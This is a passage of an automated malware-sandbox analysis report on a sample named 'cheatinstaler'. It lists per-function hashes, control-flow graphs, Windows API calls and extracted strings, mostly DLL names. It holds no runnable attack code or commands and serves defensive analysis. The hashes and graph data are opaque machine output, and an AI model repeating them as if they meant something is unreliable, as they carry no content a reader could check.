                                                                                                  • Instruction ID: 15e4a566c358f155d838706601cf89f9929580be20332c836bbfe673dea67c43
                                                                                                  • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                                  • Instruction Fuzzy Hash: 65910832B186418AEB14DF2AE8106AAA7A1FBC4785F505535EECD87B59DF3CE905CB00
                                                                                                  Function 00007FF6C16D8624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                  • String ID: PNG
                                                                                                  • API String ID: 541704414-364855578
                                                                                                  • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                                  • Instruction ID: 1b013200bc1eb9a3611ace8fb7c2e97576cc8fe13c96b5ea48a005b759dffb35
                                                                                                  • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                                  • Instruction Fuzzy Hash: FF412D25B09B0282EF049F17D85837963A4AF88B96F144435DEDD873A4EF7CE469D740
                                                                                                  Function 00007FF6C16BF930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: __tmp_reference_source_
                                                                                                  • API String ID: 3668304517-685763994
                                                                                                  • Opcode ID: 6851538e357941a99ebb696b081bc24ed3bcd29be91ebe21427510cb9cba344c
                                                                                                  • Instruction ID: 1321c4b14bbaec7f046a777dd2950280d1c2c3cc3c4cc5469397de9846e06dec
                                                                                                  • Opcode Fuzzy Hash: 6851538e357941a99ebb696b081bc24ed3bcd29be91ebe21427510cb9cba344c
                                                                                                  • Instruction Fuzzy Hash: EFE29066A086C292EF64DF66E0503BEA7A1FB81785F404136DBDD83AA5CF3CE455E700
                                                                                                  Function 00007FF6C16B4840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: CMT
                                                                                                  • API String ID: 3668304517-2756464174
                                                                                                  • Opcode ID: f3c9c95c157df1c99ad266365504da1f39fa52ba75423407634179f88c0c16ad
                                                                                                  • Instruction ID: a3f599713d6e075609997949807ad7e237c74a099133a41c13dc2c2689b9ccc4
                                                                                                  • Opcode Fuzzy Hash: f3c9c95c157df1c99ad266365504da1f39fa52ba75423407634179f88c0c16ad
                                                                                                  • Instruction Fuzzy Hash: E0E2EF22B0868286EB28DF76D4502FE67A1FB45386F444136EADE87796DF3CE455E300
                                                                                                  Function 00007FF6C16C40BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 3714 7ff6c16c40bc-7ff6c16c40f3 3715 7ff6c16c41d2-7ff6c16c41df FindNextFileW 3714->3715 3716 7ff6c16c40f9-7ff6c16c4101 3714->3716 3719 7ff6c16c41e1-7ff6c16c41f1 GetLastError 3715->3719 3720 7ff6c16c41f3-7ff6c16c41f6 3715->3720 3717 7ff6c16c4103 3716->3717 3718 7ff6c16c4106-7ff6c16c4118 FindFirstFileW 3716->3718 3717->3718 3718->3720 3721 7ff6c16c411e-7ff6c16c4146 call 7ff6c16c6a0c 3718->3721 3722 7ff6c16c41ca-7ff6c16c41cd 3719->3722 3723 7ff6c16c4211-7ff6c16c4253 call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16c8090 3720->3723 3724 7ff6c16c41f8-7ff6c16c4200 3720->3724 3736 7ff6c16c4148-7ff6c16c4164 FindFirstFileW 3721->3736 3737 7ff6c16c4167-7ff6c16c4170 3721->3737 3725 7ff6c16c42eb-7ff6c16c430e call 7ff6c16e2320 3722->3725 3750 7ff6c16c4255-7ff6c16c426c 3723->3750 3751 7ff6c16c428c-7ff6c16c42e6 call 7ff6c16cf168 * 3 3723->3751 3727 7ff6c16c4205-7ff6c16c420c call 7ff6c16b20b0 3724->3727 3728 7ff6c16c4202 3724->3728 3727->3723 3728->3727 3736->3737 3739 7ff6c16c4172-7ff6c16c4189 3737->3739 3740 7ff6c16c41a9-7ff6c16c41ad 3737->3740 3743 7ff6c16c41a4 call 7ff6c16e220c 3739->3743 3744 7ff6c16c418b-7ff6c16c419e 3739->3744 3740->3720 3742 7ff6c16c41af-7ff6c16c41be GetLastError 3740->3742 3747 7ff6c16c41c0-7ff6c16c41c6 3742->3747 3748 7ff6c16c41c8 3742->3748 3743->3740 3744->3743 3749 7ff6c16c4315-7ff6c16c431b call 7ff6c16e7904 3744->3749 3747->3722 3747->3748 3748->3722 3753 7ff6c16c426e-7ff6c16c4281 3750->3753 3754 7ff6c16c4287 call 7ff6c16e220c 3750->3754 3751->3725 3753->3754 3757 7ff6c16c430f-7ff6c16c4314 call 7ff6c16e7904 3753->3757 3754->3751 3757->3749
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                                  • String ID:
                                                                                                  • API String ID: 474548282-0
                                                                                                  • Opcode ID: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                                                                                                  • Instruction ID: 245333192ea5e8f740b6b7347bc6f001a3b70ec3daa14257daf61be439aaa3b0
                                                                                                  • Opcode Fuzzy Hash: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                                                                                                  • Instruction Fuzzy Hash: AA618062A08A8281EF10EF2AE8502796361FF857A6F505331EAED83BD9DF3CD544D700
                                                                                                  Function 00007FF6C16B5E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 3851 7ff6c16b5e24-7ff6c16b6129 call 7ff6c16c833c call 7ff6c16c85f0 3857 7ff6c16b612e-7ff6c16b6132 3851->3857 3858 7ff6c16b6141-7ff6c16b6171 call 7ff6c16c83d8 call 7ff6c16c8570 call 7ff6c16c8528 3857->3858 3859 7ff6c16b6134-7ff6c16b613c call 7ff6c16b6fcc 3857->3859 3877 7ff6c16b6973-7ff6c16b6976 call 7ff6c16b466c 3858->3877 3878 7ff6c16b6177-7ff6c16b6179 3858->3878 3865 7ff6c16b697b 3859->3865 3867 7ff6c16b697e-7ff6c16b6985 3865->3867 3869 7ff6c16b69b4-7ff6c16b69e3 call 7ff6c16e2320 3867->3869 3870 7ff6c16b6987-7ff6c16b6998 3867->3870 3871 7ff6c16b69af call 7ff6c16e220c 3870->3871 3872 7ff6c16b699a-7ff6c16b69ad 3870->3872 3871->3869 3872->3871 3875 7ff6c16b69e4-7ff6c16b69e9 call 7ff6c16e7904 3872->3875 3886 7ff6c16b69ea-7ff6c16b69ef call 7ff6c16e7904 3875->3886 3877->3865 3878->3877 3880 7ff6c16b617f-7ff6c16b6189 3878->3880 3880->3877 3883 7ff6c16b618f-7ff6c16b6192 3880->3883 3883->3877 3885 7ff6c16b6198-7ff6c16b61aa call 7ff6c16c85f0 3883->3885 3885->3859 3891 7ff6c16b61ac-7ff6c16b61fd call 7ff6c16c84f8 call 7ff6c16c8528 * 2 3885->3891 3892 7ff6c16b69f0-7ff6c16b69f7 call 7ff6c16e7904 3886->3892 3901 7ff6c16b623f-7ff6c16b6249 3891->3901 3902 7ff6c16b61ff-7ff6c16b6222 call 7ff6c16b466c call 7ff6c16bba0c 3891->3902 3904 7ff6c16b6266-7ff6c16b6270 3901->3904 3905 7ff6c16b624b-7ff6c16b6260 call 7ff6c16c8528 3901->3905 3902->3901 3919 7ff6c16b6224-7ff6c16b622e call 7ff6c16b433c 3902->3919 3908 7ff6c16b627e-7ff6c16b6296 call 7ff6c16b334c 3904->3908 3909 7ff6c16b6272-7ff6c16b627b call 7ff6c16c8528 3904->3909 3905->3877 3905->3904 3917 7ff6c16b62b3 3908->3917 3918 7ff6c16b6298-7ff6c16b629b 3908->3918 3909->3908 3921 7ff6c16b62b6-7ff6c16b62c8 3917->3921 3918->3917 3920 7ff6c16b629d-7ff6c16b62b1 3918->3920 3919->3901 3920->3917 3920->3921 3923 7ff6c16b62ce-7ff6c16b62d1 3921->3923 3924 7ff6c16b68b7-7ff6c16b6929 call 7ff6c16c4d04 call 7ff6c16c8528 3921->3924 3925 7ff6c16b6481-7ff6c16b64f4 call 7ff6c16c4c74 call 7ff6c16c8528 * 2 3923->3925 3926 7ff6c16b62d7-7ff6c16b62da 3923->3926 3941 7ff6c16b6936 3924->3941 3942 7ff6c16b692b-7ff6c16b6934 call 7ff6c16c8528 3924->3942 3958 7ff6c16b64f6-7ff6c16b6500 3925->3958 3959 7ff6c16b6507-7ff6c16b6533 call 7ff6c16c8528 3925->3959 3926->3925 3928 7ff6c16b62e0-7ff6c16b62e3 3926->3928 3931 7ff6c16b632e-7ff6c16b6353 call 7ff6c16c8528 3928->3931 3932 7ff6c16b62e5-7ff6c16b62e8 3928->3932 3945 7ff6c16b639e-7ff6c16b63c5 call 7ff6c16c8528 call 7ff6c16c8384 3931->3945 3946 7ff6c16b6355-7ff6c16b638f call 7ff6c16b4228 call 7ff6c16b3c84 call 7ff6c16b701c call 7ff6c16b1fa0 3931->3946 3935 7ff6c16b62ee-7ff6c16b6329 call 7ff6c16c8528 3932->3935 3936 7ff6c16b696d-7ff6c16b6971 3932->3936 3935->3936 3936->3867 3948 7ff6c16b6939-7ff6c16b6946 3941->3948 3942->3948 3970 7ff6c16b6402-7ff6c16b641f call 7ff6c16c8444 3945->3970 3971 7ff6c16b63c7-7ff6c16b6400 call 7ff6c16b4228 call 7ff6c16b3c84 call 7ff6c16b701c call 7ff6c16b1fa0 3945->3971 3996 7ff6c16b6390-7ff6c16b6399 call 7ff6c16b1fa0 3946->3996 3953 7ff6c16b6948-7ff6c16b694a 3948->3953 3954 7ff6c16b694c 3948->3954 3953->3954 3961 7ff6c16b694f-7ff6c16b6959 3953->3961 3954->3961 3958->3959 3972 7ff6c16b6535-7ff6c16b6544 call 7ff6c16c83d8 call 7ff6c16cf134 3959->3972 3973 7ff6c16b6549-7ff6c16b6557 3959->3973 3961->3936 3965 7ff6c16b695b-7ff6c16b6968 call 7ff6c16b4840 3961->3965 3965->3936 3992 7ff6c16b6421-7ff6c16b646f call 7ff6c16c8444 * 2 call 7ff6c16cc800 call 7ff6c16e4a70 3970->3992 3993 7ff6c16b6475-7ff6c16b647c 3970->3993 3971->3996 3972->3973 3978 7ff6c16b6572-7ff6c16b6595 call 7ff6c16c8528 3973->3978 3979 7ff6c16b6559-7ff6c16b656c call 7ff6c16c83d8 3973->3979 3997 7ff6c16b65a0-7ff6c16b65b0 3978->3997 3998 7ff6c16b6597-7ff6c16b659e 3978->3998 3979->3978 3992->3993 3993->3936 3996->3945 3999 7ff6c16b65b3-7ff6c16b65eb call 7ff6c16c8528 * 2 3997->3999 3998->3999 4015 7ff6c16b65f6-7ff6c16b65fa 3999->4015 4016 7ff6c16b65ed-7ff6c16b65f4 3999->4016 4018 7ff6c16b6603-7ff6c16b6632 4015->4018 4020 7ff6c16b65fc 4015->4020 4016->4018 4021 7ff6c16b663f 4018->4021 4022 7ff6c16b6634-7ff6c16b6638 4018->4022 4020->4018 4024 7ff6c16b6641-7ff6c16b6656 4021->4024 4022->4021 4023 7ff6c16b663a-7ff6c16b663d 4022->4023 4023->4024 4025 7ff6c16b6658-7ff6c16b665b 4024->4025 4026 7ff6c16b66ca 4024->4026 4025->4026 4028 7ff6c16b665d-7ff6c16b6683 4025->4028 4027 7ff6c16b66d2-7ff6c16b6731 call 7ff6c16b3d00 call 7ff6c16c8444 call 7ff6c16d0d54 4026->4027 4039 7ff6c16b6745-7ff6c16b6749 4027->4039 4040 7ff6c16b6733-7ff6c16b6740 call 7ff6c16b4840 4027->4040 4028->4027 4029 7ff6c16b6685-7ff6c16b66a9 4028->4029 4031 7ff6c16b66b2-7ff6c16b66bf 4029->4031 4032 7ff6c16b66ab 4029->4032 4031->4027 4034 7ff6c16b66c1-7ff6c16b66c8 4031->4034 4032->4031 4034->4027 4042 7ff6c16b675b-7ff6c16b6772 call 7ff6c16e797c 4039->4042 4043 7ff6c16b674b-7ff6c16b6756 call 7ff6c16b473c 4039->4043 4040->4039 4049 7ff6c16b6774 4042->4049 4050 7ff6c16b6777-7ff6c16b677e 4042->4050 4048 7ff6c16b6859-7ff6c16b6860 4043->4048 4051 7ff6c16b6862-7ff6c16b6872 call 7ff6c16b433c 4048->4051 4052 7ff6c16b6873-7ff6c16b687b 4048->4052 4049->4050 4053 7ff6c16b6780-7ff6c16b6783 4050->4053 4054 7ff6c16b67a3-7ff6c16b67ba call 7ff6c16e797c 4050->4054 4051->4052 4052->3936 4056 7ff6c16b6881-7ff6c16b6892 4052->4056 4057 7ff6c16b6785 4053->4057 4058 7ff6c16b679c 4053->4058 4067 7ff6c16b67bf-7ff6c16b67c6 4054->4067 4068 7ff6c16b67bc 4054->4068 4061 7ff6c16b6894-7ff6c16b68a7 4056->4061 4062 7ff6c16b68ad-7ff6c16b68b2 call 7ff6c16e220c 4056->4062 4063 7ff6c16b6788-7ff6c16b6791 4057->4063 4058->4054 4061->3892 4061->4062 4062->3936 4063->4054 4066 7ff6c16b6793-7ff6c16b679a 4063->4066 4066->4058 4066->4063 4067->4048 4069 7ff6c16b67cc-7ff6c16b67cf 4067->4069 4068->4067 4071 7ff6c16b67d1 4069->4071 4072 7ff6c16b67e8-7ff6c16b67f0 4069->4072 4073 7ff6c16b67d4-7ff6c16b67dd 4071->4073 4072->4048 4074 7ff6c16b67f2-7ff6c16b6826 call 7ff6c16c8360 call 7ff6c16c8598 call 7ff6c16c8528 4072->4074 4073->4048 4075 7ff6c16b67df-7ff6c16b67e6 4073->4075 4074->4048 4082 7ff6c16b6828-7ff6c16b6839 4074->4082 4075->4072 4075->4073 4083 7ff6c16b6854 call 7ff6c16e220c 4082->4083 4084 7ff6c16b683b-7ff6c16b684e 4082->4084 4083->4048 4084->3886 4084->4083
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CMT
                                                                                                  • API String ID: 0-2756464174
                                                                                                  • Opcode ID: 1483503f4f6562bc116dab0f55c891e212737330d95d7192c6dc5e801ab4a3f4
                                                                                                  • Instruction ID: ba418ccde15b1899d1b06e2e1ed03aa9f9000188d63238c57303b22a85acda12
                                                                                                  • Opcode Fuzzy Hash: 1483503f4f6562bc116dab0f55c891e212737330d95d7192c6dc5e801ab4a3f4
                                                                                                  • Instruction Fuzzy Hash: 4142EF22B0968296EB28DF76C1502FD67A1EB51345F400136EBDE936D6DF3CE52AE300
                                                                                                  Function 00007FF6C16CDFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 7ff6c16cdfd0-7ff6c16ce024 call 7ff6c16e2450 GetModuleHandleW 3 7ff6c16ce07b-7ff6c16ce3a5 0->3 4 7ff6c16ce026-7ff6c16ce039 GetProcAddress 0->4 7 7ff6c16ce503-7ff6c16ce521 call 7ff6c16c6454 call 7ff6c16c7df4 3->7 8 7ff6c16ce3ab-7ff6c16ce3b4 call 7ff6c16eb788 3->8 5 7ff6c16ce053-7ff6c16ce066 GetProcAddress 4->5 6 7ff6c16ce03b-7ff6c16ce04a 4->6 5->3 10 7ff6c16ce068-7ff6c16ce078 5->10 6->5 20 7ff6c16ce525-7ff6c16ce52f call 7ff6c16c51a4 7->20 8->7 16 7ff6c16ce3ba-7ff6c16ce3fd call 7ff6c16c6454 CreateFileW 8->16 10->3 21 7ff6c16ce403-7ff6c16ce416 SetFilePointer 16->21 22 7ff6c16ce4f0-7ff6c16ce4fe CloseHandle call 7ff6c16b1fa0 16->22 28 7ff6c16ce564-7ff6c16ce5ac call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16c8090 call 7ff6c16b1fa0 call 7ff6c16c32bc 20->28 29 7ff6c16ce531-7ff6c16ce53c call 7ff6c16cdd88 20->29 21->22 24 7ff6c16ce41c-7ff6c16ce43e ReadFile 21->24 22->7 24->22 27 7ff6c16ce444-7ff6c16ce452 24->27 31 7ff6c16ce800-7ff6c16ce807 call 7ff6c16e2624 27->31 32 7ff6c16ce458-7ff6c16ce4ac call 7ff6c16e797c call 7ff6c16b129c 27->32 70 7ff6c16ce5b1-7ff6c16ce5b4 28->70 29->28 38 7ff6c16ce53e-7ff6c16ce562 CompareStringW 29->38 49 7ff6c16ce4c3-7ff6c16ce4d9 call 7ff6c16cd0a0 32->49 38->28 42 7ff6c16ce5bd-7ff6c16ce5c6 38->42 42->20 47 7ff6c16ce5cc 42->47 50 7ff6c16ce5d1-7ff6c16ce5d4 47->50 64 7ff6c16ce4ae-7ff6c16ce4be call 7ff6c16cdd88 49->64 65 7ff6c16ce4db-7ff6c16ce4eb call 7ff6c16b1fa0 * 2 49->65 51 7ff6c16ce63f-7ff6c16ce642 50->51 52 7ff6c16ce5d6-7ff6c16ce5d9 50->52 55 7ff6c16ce7c2-7ff6c16ce7ff call 7ff6c16b1fa0 * 2 call 7ff6c16e2320 51->55 56 7ff6c16ce648-7ff6c16ce65b call 7ff6c16c7eb0 call 7ff6c16c51a4 51->56 57 7ff6c16ce5dd-7ff6c16ce62d call 7ff6c16e797c call 7ff6c16b129c call 7ff6c16c8090 call 7ff6c16b1fa0 call 7ff6c16c32bc 52->57 82 7ff6c16ce661-7ff6c16ce701 call 7ff6c16cdd88 * 2 call 7ff6c16caae0 call 7ff6c16cda98 call 7ff6c16caae0 call 7ff6c16cdc2c call 7ff6c16d87ac call 7ff6c16b19e0 56->82 83 7ff6c16ce706-7ff6c16ce753 call 7ff6c16cda98 AllocConsole 56->83 108 7ff6c16ce62f-7ff6c16ce638 57->108 109 7ff6c16ce63c 57->109 64->49 65->22 76 7ff6c16ce5ce 70->76 77 7ff6c16ce5b6 70->77 76->50 77->42 97 7ff6c16ce7b4-7ff6c16ce7bb call 7ff6c16b19e0 ExitProcess 82->97 94 7ff6c16ce755-7ff6c16ce7aa GetCurrentProcessId AttachConsole call 7ff6c16ce868 call 7ff6c16ce858 GetStdHandle WriteConsoleW Sleep FreeConsole 83->94 95 7ff6c16ce7b0 83->95 94->95 95->97 108->57 112 7ff6c16ce63a 108->112 109->51 112->51
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                  • API String ID: 1496594111-2013832382
                                                                                                  • Opcode ID: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                                  • Instruction ID: e462041f5ca948c9966cebe60edf4a86fde15a071c13dfd97e29767e636a5283
                                                                                                  • Opcode Fuzzy Hash: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                                  • Instruction Fuzzy Hash: 87324E31A09B8295EB119F26E8502E973B8FF44356F500236EADD877A5EF3CE254D740
                                                                                                  Function 00007FF6C16C98DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16C8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C16C8F8D
                                                                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6C16C9F75
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16CA42F
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16CA435
                                                                                                    • Part of subcall function 00007FF6C16D0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6C16D0B44), ref: 00007FF6C16D0BE9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                  • API String ID: 3629253777-3268106645
